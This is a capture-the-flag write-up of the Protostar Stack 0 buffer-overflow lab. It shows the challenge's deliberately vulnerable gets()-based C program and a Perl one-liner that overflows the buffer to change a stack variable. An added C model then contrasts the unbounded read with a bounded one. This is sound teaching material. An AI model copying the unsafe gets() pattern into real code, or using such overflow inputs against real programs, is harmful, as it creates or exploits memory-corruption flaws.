Exploit Exercises - Protostar Stack 0

I’m still working on the Nebula chain of challenges; however, I’ve been stuck on Nebula 11 for a bit now, as well as busy outside work.

In the meantime, I still have other challenges that can be solved while I learn how to do more advanced ones. Protostar is another challenge made by Exploit-Exercises, the same people who brought you Nebula.

Protostar Stack 0 is a very easy challenge. After doing a bunch of these challenges, and seeing nobody else doing them, I finally found someone, Mito125. We’ve been chatting a little bit back and forth, and I like that we both seem to have different solutions to the problems. His can be found here. Note that he blogs in Italian, but you can get the gist using Google Translate.

First, we are given a vulnerable piece of C code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];

 modified = 0;
 gets(buffer);

 if(modified != 0) {
  printf("you have changed the 'modified' variable\n");
 } else {
  printf("Try again?\n");
 }
}

My solution is very similar, differing only in the language being used. He uses Python, and I use Perl. I should switch to Python on the command line one day, but I’m set in my ways. My solution is as follows:

user@protostar:/opt/protostar/bin$ perl -e 'print "A"x65' | ./stack0
you have changed the 'modified' variable

What is happening here is that the “modified” variable is put onto the stack first and set to 0. The “buffer” comes after it and is filled when gets() reads the input, and gets() does not check how much it writes. Because of this, if you supply more than the buffer can hold (64 bytes), the extra bytes overflow into items that were placed on the stack before it. So we are essentially overflowing the buffer and assigning “A” to “modified”, which makes it non-zero.
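The overwrite described above, modelled in C next to a bounded read. This is an added example, not code from the original post or from Exploit-Exercises; the `struct frame` layout (with `modified` directly after `buffer`) and the function names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame layout: buffer first, modified directly above it. */
struct frame {
    char buffer[64];
    int  modified;
};

/* gets()-style copy: writes len bytes plus a NUL and never looks at the
   buffer size. Returns modified afterwards, or -1 if the input would leave
   the model frame (a limit of this model, not of gets()). */
static int unbounded_read(const char *input, size_t len)
{
    struct frame f;
    unsigned char *raw = (unsigned char *)&f;   /* byte view of the frame */

    if (len + 1 > sizeof f)
        return -1;
    f.modified = 0;
    memcpy(raw + offsetof(struct frame, buffer), input, len);
    raw[offsetof(struct frame, buffer) + len] = '\0';
    return f.modified;
}

/* fgets()-style copy: at most sizeof buffer - 1 bytes, then a NUL. */
static int bounded_read(const char *input, size_t len, int *truncated)
{
    struct frame f;
    size_t n = len < sizeof f.buffer - 1 ? len : sizeof f.buffer - 1;

    f.modified = 0;
    memcpy(f.buffer, input, n);
    f.buffer[n] = '\0';
    *truncated = (n < len);      /* caller can reject over-long input */
    return f.modified;
}

int main(void)
{
    char input[65];
    int truncated;

    memset(input, 'A', sizeof input);   /* constructed: same as "A"x65 */
    printf("unbounded 64: modified=0x%x\n", unbounded_read(input, 64));
    printf("unbounded 65: modified=0x%x\n", unbounded_read(input, 65));
    printf("bounded   65: modified=0x%x", bounded_read(input, 65, &truncated));
    printf(" truncated=%d\n", truncated);
    return 0;
}
```

With 64 bytes only the terminating NUL reaches `modified`, so it stays 0; the 65th byte is the first one that changes it, which is why the command above prints 65 characters.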
